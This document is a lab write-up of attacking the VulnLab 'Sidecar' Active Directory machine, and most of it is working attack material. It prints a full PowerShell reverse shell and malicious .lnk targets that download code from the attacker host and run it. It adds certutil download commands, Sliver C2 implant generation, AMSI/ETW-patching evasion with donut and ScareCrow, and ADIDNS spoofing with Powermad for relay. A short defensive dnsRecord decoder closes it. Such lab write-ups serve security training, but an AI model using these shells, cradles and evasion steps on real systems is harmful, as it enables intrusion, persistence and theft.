vulnlab-sidecar
a very hard Windows machine
Preparing the PowerShell reverse shell
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ cat puckshell.txt
function cleanup {
    # Tear down the socket and the cmd.exe child before leaving
    if ($client.Connected -eq $true) {$client.Close()}
    if ($process.ExitCode -ne $null) {$process.Close()}
    exit}
# Attacker IP and port (the nc listener)
$address = '10.8.2.138'
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
# Spawn cmd.exe with redirected stdin/stdout; its I/O is proxied over the socket
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\windows\system32\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
# Send the initial cmd.exe banner and prompt to the listener
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false
while (-not $done) {
    if ($client.Connected -ne $true) {cleanup}
    # Read one line (up to LF) from the socket; a zero-byte read means the peer closed
    $pos = 0; $i = 1
    while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
        $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
        $i = $read; $pos += $read
        if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
    if ($pos -gt 0) {
        # Feed the line to cmd.exe, then send its output back, dropping the echoed command
        $string = $encoding.GetString($networkbuffer,0,$pos)
        $inputstream.write($string)
        start-sleep 1
        if ($process.ExitCode -ne $null) {cleanup}
        else {
            $out = $encoding.GetString($outputstream.Read())
            while($outputstream.Peek() -ne -1){
                $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
            $stream.Write($encoding.GetBytes($out),0,$out.length)
            $out = $null
            $string = $null}} else {cleanup}}
Create a malicious .lnk on a Windows PC whose target downloads the script from our web server and runs it in memory. I used:
powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://10.8.2.138/puckshell.txt')))
Uploading the malicious link file
└─$ smbclient //DC01.sidecar.vl/Public
Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> shares
shares: command not found
smb: \> ls
. D 0 Sun Dec 10 15:29:38 2023
.. DHS 0 Sun Dec 10 15:20:57 2023
Backup D 0 Sun Dec 10 15:29:37 2023
Common D 0 Sun Dec 17 12:09:03 2023
Install D 0 Sun Dec 10 15:51:08 2023
Transfer D 0 Sun Dec 10 15:29:32 2023
6291455 blocks of size 4096. 2227213 blocks available
smb: \> cd Common
smb: \Common\> ls
. D 0 Sun Dec 17 12:09:03 2023
.. D 0 Sun Dec 10 15:29:38 2023
Common.lnk A 1741 Sun Dec 10 15:47:04 2023
Custom D 0 Sun Dec 17 12:14:14 2023
Install.lnk A 1666 Sun Dec 10 15:47:05 2023
Transfer.lnk A 1681 Sun Dec 10 15:47:05 2023
6291455 blocks of size 4096. 2227210 blocks available
smb: \Common\> cd Custom
smb: \Common\Custom\> ls
. D 0 Sun Dec 17 12:14:14 2023
.. D 0 Sun Dec 17 12:09:03 2023
info.txt A 45 Sun Dec 10 17:08:38 2023
6291455 blocks of size 4096. 2227210 blocks available
smb: \Common\Custom\> rm *.lnk
smb: \Common\Custom\> put hillie3.lnk
putting file hillie3.lnk as \Common\Custom\hillie3.lnk (22.8 kb/s) (average 0.4 kb/s)
smb: \Common\Custom\> ls
. D 0 Wed Jul 17 16:30:06 2024
.. D 0 Sun Dec 17 12:09:03 2023
hillie3.lnk A 2006 Wed Jul 17 16:30:06 2024
info.txt A 45 Sun Dec 10 17:08:38 2023
6291455 blocks of size 4096. 2237771 blocks available
smb: \Common\Custom\>
Serving the shell
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.143.214 - - [17/Jul/2024 16:26:20] "GET /rcat.exe HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:30:16] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:32:20] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:33:20] "GET /puckshell.txt HTTP/1.1" 200 -
Getting the shell
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.143.214] 49817
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\WINDOWS\System32\WindowsPowerShell\v1.0>whoami
sidecar\e.klaymore
C:\WINDOWS\System32\WindowsPowerShell\v1.0>cd c:\users\
c:\Users>dir
Volume in drive C has no label.
Volume Serial Number is 442A-8056
Directory of c:\Users
11/30/2023 11:55 PM <DIR> .
11/30/2023 11:55 PM <DIR> ..
01/12/2024 05:59 PM <DIR> Admin
12/02/2023 01:24 PM <DIR> administrator
01/12/2024 05:50 PM <DIR> e.klaymore
11/30/2023 05:49 PM <DIR> Public
0 File(s) 0 bytes
6 Dir(s) 3,720,708,096 bytes free
c:\Users>cd e.klaymore
c:\Users\e.klaymore>cd desktop
c:\Users\e.klaymore\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 442A-8056
Directory of c:\Users\e.klaymore\Desktop
12/01/2023 09:26 AM <DIR> .
12/01/2023 09:26 AM <DIR> ..
0 File(s) 0 bytes
2 Dir(s) 3,720,572,928 bytes free
c:\Users\e.klaymore\Desktop>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
c:\Users\e.klaymore\Desktop>net users
User accounts for \\WS01
-------------------------------------------------------------------------------
Admin Administrator DefaultAccount
Deployer Gast
The command completed successfully.
c:\Users\e.klaymore\Desktop>net user /domain
The request will be processed at a domain controller for domain Sidecar.vl.
User accounts for \\DC01.Sidecar.vl
-------------------------------------------------------------------------------
A.Roberts Administrator E.Klaymore
Guest J.Chaffrey krbtgt
M.smith O.osvald P.robinson
svc_deploy
The command completed successfully.
.
c:\temp>certutil.exe -urlcache -f http://10.8.2.138:8000/nc64.exe nc64.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\temp>dir
Volume in drive C has no label.
Volume Serial Number is 442A-8056
Directory of c:\temp
07/17/2024 05:57 PM <DIR> .
07/17/2024 05:57 PM <DIR> ..
07/17/2024 05:57 PM 45,272 nc64.exe
1 File(s) 45,272 bytes
2 Dir(s) 3,713,388,544 bytes free
Start Sliver C2
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sudo systemctl start sliver
[sudo] password for puck:
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk
.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'
All hackers gain deathtouch
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
sliver > generate --mtls 10.8.2.138 --os windows --arch amd64 --format exe
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 20s
[*] Implant saved to /home/puck/vulnlab/sidecar/EVIL_USUAL.exe
sliver >
Let's convert the implant (here as payload.exe) into position-independent shellcode with donut:
┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ./donut payload.exe
[ Donut shellcode generator v0.9.3
[ Copyright (c) 2019 TheWover, Odzhan
[ Instance type : Embedded
[ Module file : "payload.exe"
[ Entropy : Random names + Encryption
[ File type : EXE
[ Target CPU : x86+amd64
[ AMSI/WDLP : continue
[ Shellcode : "loader.bin"
┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ls
donut donut.1 EVIL_USUAL.exe examples lib LICENSE loader.bin payload.exe README.html
Then wrap loader.bin in a ScareCrow loader:
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ./ScareCrow -I loader.bin --domain microsoft.com
_________ _________
/ _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __
\_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ /
/ \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) /
/_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/
\/ \/ \/ \/ \/
(@Tyl0us)
“Fear, you must understand is more than a mere obstacle.
Fear is a TEACHER. the first one you ever had.”
[!] Missing Garble... Downloading it now
[*] Encrypting Shellcode Using ELZMA Encryption
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[+] Patched AMSI Enabled
[+] Sleep Timer set for 2584 milliseconds
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With OneNote's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing OneNote.exe With a Fake Cert
[+] Signed File Created
[+] Binary Compiled
[!] Sha256 hash of OneNote.exe: ad60fffef99119074e16c057982bc80cb5b4bf56f97006f6ca3de989d547ddb6
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ls
Cryptor go.sum Loader main.json README.md ScareCrow.go Struct
go.mod limelighter loader.bin OneNote.exe ScareCrow Screenshots Utils
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$
Got a session, but after uploading SharpHound.exe my Sliver session gets disconnected.
sliver > sessions
[*] No sessions 🙁
[*] Session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:52:52 CEST
sliver > use 2a9abc07-3992-40be-918f-375eee061970
[*] Active session EVIL_USUAL (2a9abc07-3992-40be-918f-375eee061970)
sliver (EVIL_USUAL) > info
Session ID: 2a9abc07-3992-40be-918f-375eee061970
Name: EVIL_USUAL
Hostname: ws01
UUID: ec2f60bf-8718-2ae6-cabf-54c56e35f9d2
Username: SIDECAR\E.Klaymore
UID: S-1-5-21-3976908837-939936849-1028625813-1609
GID: S-1-5-21-3976908837-939936849-1028625813-513
PID: 3812
OS: windows
Version: 10 build 10240 x86_64
Locale: en-US
Arch: amd64
Active C2: mtls://10.8.2.138:8888
Remote Address: 10.10.151.22:49977
Proxy URL:
Reconnect Interval: 1m0s
First Contact: Thu Jul 18 08:52:52 CEST 2024 (41s ago)
Last Checkin: Thu Jul 18 08:52:52 CEST 2024 (41s ago)
sliver (EVIL_USUAL) > ls
c:\temp (2 items, 33.6 MiB)
===========================
-rw-rw-rw- nc64.exe 44.2 KiB Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw- one.exe 33.6 MiB Thu Jul 18 08:49:01 +0200 2024
sliver (EVIL_USUAL) > whoami
Logon ID: SIDECAR\E.Klaymore
[*] Current Token ID: SIDECAR\E.Klaymore
sliver (EVIL_USUAL) > upload SharpHound.exe
[*] Wrote file to c:\temp\SharpHound.exe
sliver (EVIL_USUAL) > ls
c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw- nc64.exe 44.2 KiB Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw- one.exe 33.6 MiB Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw- SharpHound.exe 1022.0 KiB Thu Jul 18 08:54:33 +0200 2024
sliver (EVIL_USUAL) > upload SharpHound.exe
[*] Wrote file to c:\temp\SharpHound.exe
sliver (EVIL_USUAL) > ls
c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw- nc64.exe 44.2 KiB Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw- one.exe 33.6 MiB Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw- SharpHound.exe 1022.0 KiB Thu Jul 18 08:54:53 +0200 2024
[!] Lost session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:55:31 CEST
[!] Active session disconnected
sliver (EVIL_USUAL) > execute-assembly -i -E /SharpHound.exe "-c all -d sidecar.vl --outputdirectory C:\windows\tasks --zipfilename out.zip"
So the next .lnk has to fetch and start a beacon instead of a session implant; the link target used:
C:\Windows\System32\cmd.exe /c powershell -c iwr http://10.8.2.138/beacon.exe -o C:\windows\tasks\beacon.exe; C:\windows\tasks\beacon.exe
.
Created a working beacon and transferred it to the box with
certutil.exe -urlcache -f http://10.8.2.138/powerpoint.exe power.exe
and ran c:\programdata\power.exe on the box
.
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk
.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'
All hackers gain persist
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
sliver > jobs
ID Name Protocol Port Stage Profile
==== ======= ========== ====== ===============
1 https tcp 8443
sliver > https --lport 8443
[*] Starting HTTPS :8443 listener ...
[*] Successfully started job #2
[!] Job #2 stopped (tcp/https)
[!] Job #2 stopped (tcp/https)
sliver > jobs
ID Name Protocol Port Stage Profile
==== ======= ========== ====== ===============
1 https tcp 8443
sliver > jobs
ID Name Protocol Port Stage Profile
==== ======= ========== ====== ===============
1 https tcp 8443
[*] Beacon f4937c47 sitecar-3 - 10.10.177.38:50444 (ws01) - windows/amd64 - Mon, 14 Oct 2024 20:21:04 CEST
sliver > use f4937c47-c290-4c60-a7bc-438fcf292b8d
[*] Active beacon sitecar-3 (f4937c47-c290-4c60-a7bc-438fcf292b8d)
sliver (sitecar-3) > whoami
Logon ID: SIDECAR\E.Klaymore
[*] Tasked beacon sitecar-3 (952ffb7c)
[+] sitecar-3 completed task 952ffb7c
sliver (sitecar-3) >
.
sliver (sitecar-3) > sharp-hound-4 -i -s -t 120 -- -c all,gpolocalgroup
[*] Tasked beacon sitecar-3 (15da41ae)
sliver (sitecar-3) > ls
[*] Tasked beacon sitecar-3 (a86427ba)
[+] sitecar-3 completed task a86427ba
c:\ProgramData\temp (0 items, 0 B)
==================================
[+] sitecar-3 completed task 15da41ae
[*] sharp-hound-4 output:
2024-10-23T08:49:59.4279652+02:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2024-10-23T08:49:59.8243987+02:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2024-10-23T08:49:59.8747021+02:00|INFORMATION|Initializing SharpHound at 8:49 AM on 10/23/2024
2024-10-23T08:50:00.0784908+02:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for Sidecar.vl : DC01.Sidecar.vl
2024-10-23T08:50:48.7730432+02:00|INFORMATION|Saving cache with stats: 295 ID to type mappings.
297 name to SID mappings.
2 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-10-23T08:50:48.8487177+02:00|INFORMATION|SharpHound Enumeration Completed at 8:50 AM on 10/23/2024! Happy Graphing!
[*] Output saved to /tmp/sharp-hound-4_.2445145387.log
sliver (sitecar-3) > ls
[*] Tasked beacon sitecar-3 (0b9f5da2)
[+] sitecar-3 completed task 0b9f5da2
c:\ProgramData\temp (2 items, 83.9 KiB)
=======================================
-rw-rw-rw- 20241023085045_BloodHound.zip 31.2 KiB Wed Oct 23 08:50:48 +0200 2024
-rw-rw-rw- Y2RjZTMzZTktMzhkNS00MDAwLTkwZTUtM2MwNDdmM2QyMzRj.bin 52.7 KiB Wed Oct 23 08:50:48 +0200 2024
sliver (sitecar-3) > download 20241023085045_BloodHound.zip
[*] Tasked beacon sitecar-3 (44459e36)
[+] sitecar-3 completed task 44459e36
[*] Wrote 31936 bytes (1 file successfully, 0 files unsuccessfully) to /home/puck/vulnlab/sidecar/20241023085045_BloodHound.zip
sliver (sitecar-3) >
To be continued …
First we need to promote our beacon to a session to be able to run execute-shellcode.
Warning: if we use the interactive shellcode session, we need to restart the Sliver server afterwards to execute assemblies.
Thus, like this:
sliver > sessions
[*] No sessions 🙁
[*] Beacon e5de6c1f sitecar-3 - 10.10.173.118:50379 (ws01) - windows/amd64 - Fri, 25 Oct 2024 08:55:46 CEST
sliver > use e5de6c1f-8a91-454b-9154-8006649aa751
[*] Active beacon sitecar-3 (e5de6c1f-8a91-454b-9154-8006649aa751)
sliver (sitecar-3) > interactive
[*] Using beacon's active C2 endpoint: https://10.8.2.138:8443
[*] Tasked beacon sitecar-3 (85062590)
[*] Session 23eb3ba7 sitecar-3 - 10.10.173.118:50418 (ws01) - windows/amd64 - Fri, 25 Oct 2024 08:57:02 CEST
sliver (sitecar-3) > use 23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39
[*] Active session sitecar-3 (23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39)
sliver (sitecar-3) > sessions
ID Transport Remote Address Hostname Username Operating System Health
========== =========== ===================== ========== ==================== ================== =========
23eb3ba7 http(s) 10.10.173.118:50418 ws01 SIDECAR\E.Klaymore windows/amd64 [ALIVE]
sliver (sitecar-3) > ^C
input Ctrl-c once more to exit
sliver (sitecar-3) > ^C
interrupted
and then run execute-shellcode -i /tmp/UnmanagedPowerShell.bin
sliver (sitecar-3) > ^C
interrupted
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk
███████╗██╗ ██╗██╗ ██╗███████╗██████╗
██╔════╝██║ ██║██║ ██║██╔════╝██╔══██╗
███████╗██║ ██║██║ ██║█████╗ ██████╔╝
╚════██║██║ ██║╚██╗ ██╔╝██╔══╝ ██╔══██╗
███████║███████╗██║ ╚████╔╝ ███████╗██║ ██║
╚══════╝╚══════╝╚═╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝
All hackers gain fear
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options
sliver > sessions
ID Transport Remote Address Hostname Username Operating System Health
========== =========== ===================== ========== ==================== ================== =========
23eb3ba7 http(s) 10.10.173.118:50418 ws01 SIDECAR\E.Klaymore windows/amd64 [ALIVE]
sliver > use 23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39
[*] Active session sitecar-3 (23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39)
sliver (sitecar-3) > execute-shellcode -i /tmp/UnmanagedPowerShell.bin
[*] Started remote shell with pid 2108
PS > dir
Directory: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/25/2024 8:53 AM 24830704 power.exe
PS > New-ADIDNSNode -Tombstone -Verbose -Node puck.sidecar.vl -Data 10.8.2.138
VERBOSE: [+] Domain Controller = DC01.Sidecar.vl
VERBOSE: [+] Domain = Sidecar.vl
VERBOSE: [+] Forest = Sidecar.vl
VERBOSE: [+] ADIDNS Zone = Sidecar.vl
VERBOSE: [+] Distinguished Name = DC=puck.sidecar.vl,DC=Sidecar.vl,CN=MicrosoftDNS,DC=DomainDNSZones,DC=Sidecar,DC=vl
VERBOSE: [+] DNSRecord = 04-00-01-00-05-F0-00-00-18-01-00-00-00-00-02-58-00-00-00-00-0F-B0-38-00-0A-08-02-8A
[+] ADIDNS node puck.sidecar.vl added
PS >
.
sliver (sitecar-3) > execute-assembly -i -E /tmp/SharpHound.exe "-c all -d sidecar.vl --outputdirectory C:\windows\tasks --zipfilename out.zip"
snip...2024-10-25T12:13:31.9634793+02:00|INFORMATION|Saving cache with stats: 58 ID to type mappings.
59 name to SID mappings.
1 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-10-25T12:13:31.9939532+02:00|INFORMATION|SharpHound Enumeration Completed at 12:13 PM on 10/25/2024! Happy Graphing!
[*] Tasked beacon sitecar-3 (e2afe45b)
[+] sitecar-3 completed task e2afe45b
…
We can see that we can't create new machine accounts (ms-ds-machineaccountquota = 0):
sliver (sitecar-3) > inline-execute-assembly /tmp/StandIn_v13_Net45.exe "--object ms-DS-MachineAccountQuota=*"
[*] Tasked beacon sitecar-3 (189947d6)
sliver (sitecar-3) > execute-assembly /tmp/StandIn_v13_Net45.exe "--object ms-DS-MachineAccountQuota=*"
[*] Tasked beacon sitecar-3 (c7f43d96)
sliver (sitecar-3) > tasks
ID State Message Type Created Sent Completed
========== =========== ======================= ================================ ================================ ================================
c7f43d96 sent InvokeExecuteAssembly Fri, 25 Oct 2024 15:39:01 CEST Fri, 25 Oct 2024 15:39:07 CEST
74051079 sent RegisterExtension Fri, 25 Oct 2024 15:37:55 CEST Fri, 25 Oct 2024 15:37:59 CEST
189947d6 sent CallExtension Fri, 25 Oct 2024 15:37:55 CEST Fri, 25 Oct 2024 15:37:59 CEST
a730ea0b completed Download Fri, 25 Oct 2024 15:18:49 CEST Fri, 25 Oct 2024 15:18:56 CEST Fri, 25 Oct 2024 15:18:56 CEST
db7bfb31 completed Pwd Fri, 25 Oct 2024 15:18:19 CEST Fri, 25 Oct 2024 15:18:22 CEST Fri, 25 Oct 2024 15:18:22 CEST
[+] sitecar-3 completed task c7f43d96
[*] Output:
[?] Using DC : DC01.Sidecar.vl
[?] Object : DC=Sidecar
Path : LDAP://DC=Sidecar,DC=vl
[?] Iterating object properties
[+] ridmanagerreference
|_ CN=RID Manager$,CN=System,DC=Sidecar,DC=vl
[+] objectcategory
|_ CN=Domain-DNS,CN=Schema,CN=Configuration,DC=Sidecar,DC=vl
[+] msds-nctype
|_ 0
[+] systemflags
|_ -1946157056
[+] minpwdage
|_ -864000000000
[+] dscorepropagationdata
|_ 1/1/1601 12:00:00 AM
[+] uascompat
|_ 0
[+] usnchanged
|_ 110627
[+] instancetype
|_ 5
[+] creationtime
|_ 133743100080295319
[+] pwdhistorylength
|_ 24
[+] ms-ds-machineaccountquota
|_ 0
[+] subrefs
|_ DC=ForestDnsZones,DC=Sidecar,DC=vl
|_ DC=DomainDnsZones,DC=Sidecar,DC=vl
|_ CN=Configuration,DC=Sidecar,DC=vl
[+] lockoutduration
|_ -18000000000
[+] name
|_ Sidecar
.
This means a classic RBCD attack is off the table here: with the quota at 0 we cannot add our own computer object, so we would need another computer or service account that we already control (the SPN-less-user variant at https://www.thehacker.recipes/a-d/movement/kerberos/delegations/rbcd#rbcd-on-spn-less-users needs the credential of a user we control).
sliver (sitecar-3) > execute-shellcode -i /payloads/UnmanagedPowerShell.bin
[*] Started remote shell with pid 1652
PS > pwd
Path
----
C:\Windows\Tasks
.
# on sliver
[server] sliver (sitecar-3) > socks5 start
[*] Started SOCKS5 127.0.0.1 1081
# on local machine
proxychains -q nxc smb 192.168.100.101 -u 'puck' -p ''
.
Webdav
We first need an authentication request (or hash) from the machine account. Authentication that comes from the SMB client negotiates signing and cannot be relayed to LDAP, so we have to change our source to HTTP.
For this the WebClient (WebDAV) service must be running on the victim (https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/webclient)
We can check the current status using https://github.com/G0ldenGunSec/GetWebDAVStatus/
From a session (not a beacon) run
sliver (sitecar-3) > upload GetWebDAVStatus.exe
[*] Wrote file to c:\Windows\Tasks\GetWebDAVStatus.exe
sliver (sitecar-3) > execute -o "GetWebDAVStatus.exe" "127.0.0.1"
[*] Output:
[+] WebClient service is active on 127.0.0.1
sliver (sitecar-3) > execute "cmd.exe" "/c net use h: http://10.8.2.138/blub"
[*] Command executed successfully
sliver (sitecar-3) >
DNS
The WebClient only authenticates automatically to a hostname it treats as intranet, never to a raw IP address, so we first need to add a DNS record for our machine to the AD-integrated DNS zone. https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/adidns-spoofing
For this we can use Powermad (https://github.com/Kevin-Robertson/Powermad), even from a newly spawned interactive shell.
I used this Sliver shellcode: https://github.com/mmnoureldin/UnmanagedPowerShell?tab=readme-ov-file which also contains Powermad
Warning: if we use the interactive shellcode session, we need to restart the Sliver server afterwards to execute assemblies.
So we execute-shellcode -i /payloads/UnmanagedPowerShell.bin, and then add a DNS entry with New-ADIDNSNode -Tombstone -Verbose -Node kali.sidecar.vl -Data 10.8.2.138
Note that -Node is the name relative to the zone: the VERBOSE output shows the node DC=kali.sidecar.vl being created inside the zone Sidecar.vl, i.e. the name kali.sidecar.vl.sidecar.vl, whereas -Node kali would give kali.sidecar.vl.
.
sliver (sitecar-3) > execute-shellcode -i /payloads/UnmanagedPowerShell.bin
[*] Started remote shell with pid 3364
PS > pwd
Path
----
C:\Windows\Tasks
PS > New-ADIDNSNode -Tombstone -Verbose -Node kali.sidecar.vl -Data 10.8.2.138
VERBOSE: [+] Domain Controller = DC01.Sidecar.vl
VERBOSE: [+] Domain = Sidecar.vl
VERBOSE: [+] Forest = Sidecar.vl
VERBOSE: [+] ADIDNS Zone = Sidecar.vl
VERBOSE: [+] Distinguished Name = DC=kali.sidecar.vl,DC=Sidecar.vl,CN=MicrosoftDNS,DC=DomainDNSZones,DC=Sidecar,DC=vl
VERBOSE: [+] DNSRecord = 04-00-01-00-05-F0-00-00-1E-01-00-00-00-00-02-58-00-00-00-00-62-B1-38-00-0A-08-02-8A
[+] ADIDNS node kali.sidecar.vl added
PS >
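The DNSRecord bytes that Powermad prints (for puck.sidecar.vl earlier and kali.sidecar.vl here) are the raw value of the node's dnsRecord attribute, an MS-DNSP DNS_RPC_RECORD. The decoder below is an added example, not part of this writeup or of Powermad; it parses the two exact blobs from the page and shows that each is an A record for 10.8.2.138 with a 600-second TTL, rank 0xF0 (RANK_ZONE) and a non-zero aging TimeStamp (hours since 1601, the standard AD epoch, assumed here), which is what a defender sees when reading these nodes back over LDAP. Field layout and type values are from the MS-DNSP specification.

```python
"""Decode the 'DNSRecord' byte string Powermad prints when it adds an ADIDNS node.
It is the raw dnsRecord attribute value: an MS-DNSP DNS_RPC_RECORD."""
import ipaddress
import struct
from datetime import datetime, timedelta

# Record types that matter for ADIDNS spoofing (MS-DNSP 2.2.2.1.1)
DNS_TYPES = {0x0001: "A", 0x0005: "CNAME", 0x000F: "MX", 0x001C: "AAAA", 0x0021: "SRV"}
RANK_ZONE = 0xF0                     # authoritative record in a zone (not cached/glue)
DNS_EPOCH = datetime(1601, 1, 1)     # TimeStamp counts hours from here (assumed: standard AD epoch)


def parse_dns_record(blob: bytes) -> dict:
    """Split one DNS_RPC_RECORD into its fields. Raises ValueError on a truncated blob."""
    if len(blob) < 24:
        raise ValueError("dnsRecord shorter than the 24-byte header")
    # DataLength(2) Type(2) Version(1) Rank(1) Flags(2) Serial(4): little-endian
    data_len, rtype, version, rank, flags, serial = struct.unpack_from("<HHBBHI", blob, 0)
    # TtlSeconds is stored in network byte order, then 4 reserved bytes, then TimeStamp little-endian
    (ttl,) = struct.unpack_from(">I", blob, 12)
    (timestamp,) = struct.unpack_from("<I", blob, 20)
    data = blob[24:24 + data_len]
    if len(data) != data_len:
        raise ValueError("DataLength runs past the end of the blob")
    if rtype == 0x0001 and data_len == 4:
        rdata = str(ipaddress.IPv4Address(data))
    elif rtype == 0x001C and data_len == 16:
        rdata = str(ipaddress.IPv6Address(data))
    else:
        rdata = data.hex()
    # TimeStamp 0 marks a static record; anything else is an aging (dynamic-style) record
    created = None if timestamp == 0 else DNS_EPOCH + timedelta(hours=timestamp)
    return {"type": DNS_TYPES.get(rtype, f"type{rtype}"), "version": version, "rank": rank,
            "flags": flags, "serial": serial, "ttl": ttl, "timestamp": timestamp,
            "created": created, "data": rdata}


def from_powermad(dashed_hex: str) -> dict:
    """Accept the 'AA-BB-CC' form Powermad prints in its VERBOSE output."""
    return parse_dns_record(bytes.fromhex(dashed_hex.replace("-", "")))


# The two DNSRecord values from this writeup (puck.sidecar.vl and kali.sidecar.vl)
PUCK_RECORD = "04-00-01-00-05-F0-00-00-18-01-00-00-00-00-02-58-00-00-00-00-0F-B0-38-00-0A-08-02-8A"
KALI_RECORD = "04-00-01-00-05-F0-00-00-1E-01-00-00-00-00-02-58-00-00-00-00-62-B1-38-00-0A-08-02-8A"

if __name__ == "__main__":
    for name, rec in (("puck.sidecar.vl", PUCK_RECORD), ("kali.sidecar.vl", KALI_RECORD)):
        r = from_powermad(rec)
        print(f"{name}: {r['type']} {r['data']} ttl={r['ttl']}s serial={r['serial']} "
              f"rank={r['rank']:#x} aging_timestamp={r['created']:%Y-%m-%d %H:%M} UTC")
```

The same decoder works on the dnsRecord attribute read over LDAP from the node DN shown in the VERBOSE output, which is how a blue team can spot attacker-added nodes: an A record pointing outside the expected ranges, with a fresh aging timestamp, under a name nobody registered.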
